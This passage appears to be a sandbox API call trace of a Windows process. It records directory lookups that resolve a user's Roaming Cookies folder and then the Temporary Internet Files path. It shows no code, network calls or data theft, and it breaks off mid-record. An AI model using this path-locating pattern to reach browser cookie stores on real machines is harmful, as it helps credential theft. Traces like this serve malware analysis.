SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x33700ec*="roaming") returned 1 [0127.876] SysReAllocStringLen (in: pbstr=0x33700f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x33700f8*="microsoft") returned 1 [0127.876] SysReAllocStringLen (in: pbstr=0x3370128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3370128*="windows") returned 1 [0127.876] SysReAllocStringLen (in: pbstr=0x3370134*=0x0, psz="cookies", len=0x7 | out: pbstr=0x3370134*="cookies") returned 1 [0127.877] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.877] SysReAllocStringLen (in: pbstr=0x28fdd8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdd8*="c:\\") returned 1 [0127.877] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.877] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.877] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.877] GetLastError () returned 0x12 [0127.877] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.877] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.878] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdd8*="c:\\Users\\") returned 1 [0127.878] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.878] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.878] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.878] GetLastError () returned 0x12 [0127.878] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.878] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.878] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.878] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.879] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.879] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.879] GetLastError () returned 0x12 [0127.879] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.879] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.879] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0127.879] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0127.880] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x114f2c0 [0127.880] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0127.880] GetLastError () returned 0x12 [0127.880] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.880] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0127.880] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0127.880] SysReAllocStringLen (in: pbstr=0x28fae8*="roaming", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0127.881] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x114f2c0 [0127.881] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0127.881] GetLastError () returned 0x12 [0127.881] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.881] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", len=0x2c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft") returned 1 [0127.881] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", len=0x2d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\") returned 1 [0127.882] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0127.882] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x114f2c0 [0127.882] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0127.882] GetLastError () returned 0x12 [0127.882] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.882] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", len=0x34 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows") returned 1 [0127.883] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", len=0x35 | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\") returned 1 [0127.883] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="cookies", len=0x7 | out: pbstr=0x28fae8*="cookies") returned 1 [0127.883] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\cookies" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0x114f2c0 [0127.883] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 0 [0127.883] GetLastError () returned 0x12 [0127.883] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.883] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0127.884] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0127.885] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0127.885] SysReAllocStringLen (in: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fdd8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0127.886] SysReAllocStringLen (in: pbstr=0x28fddc*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fddc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0127.886] SysReAllocStringLen (in: pbstr=0x3370080*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x3370080*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0127.886] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x3373b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0127.887] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", cchLength=0x4b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 0x4b [0127.887] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files", len=0x4b | out: pbstr=0x337009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files") returned 1 [0127.887] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.888] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.888] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33700d4*="keecfmwgj") returned 1 [0127.888] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.888] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="local", len=0x5 | out: pbstr=0x33700ec*="local") returned 1 [0127.889] SysReAllocStringLen (in: pbstr=0x33700f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x33700f8*="microsoft") returned 1 [0127.890] SysReAllocStringLen (in: pbstr=0x3370128*=0x0, psz="windows", len=0x7 | out: pbstr=0x3370128*="windows") returned 1 [0127.890] SysReAllocStringLen (in: pbstr=0x3370134*=0x0, psz="temporary internet files", len=0x18 | out: pbstr=0x3370134*="temporary internet files") returned 1 [0127.890] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.891] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdcc*="c:\\") returned 1 [0127.891] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.891] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114f2c0 [0127.891] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.891] GetLastError () returned 0x12 [0127.891] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.891] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.892] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdcc*="c:\\Users\\") returned 1 [0127.892] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0127.892] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114f2c0 [0127.892] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.892] GetLastError () returned 0x12 [0127.892] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.893] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.893] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.893] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.893] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x114f2c0 [0127.893] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0127.893] GetLastError () returned 0x12 [0127.893] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.894] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0127.894] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x114f2c0 [0127.895] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0127.895] GetLastError () returned 0x12 [0127.895] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.895] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x114f2c0 [0127.896] FindNextFileW (in: hFindFile=0x114f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0127.896] GetLastError () returned 0x12 [0127.896] FindClose (in: hFindFile=0x114f2c0 | out: hFindFile=0x114f2c0) returned 1 [0127.896] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1152798 [0127.897] FindNextFileW (in: hFindFile=0x1152798, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, 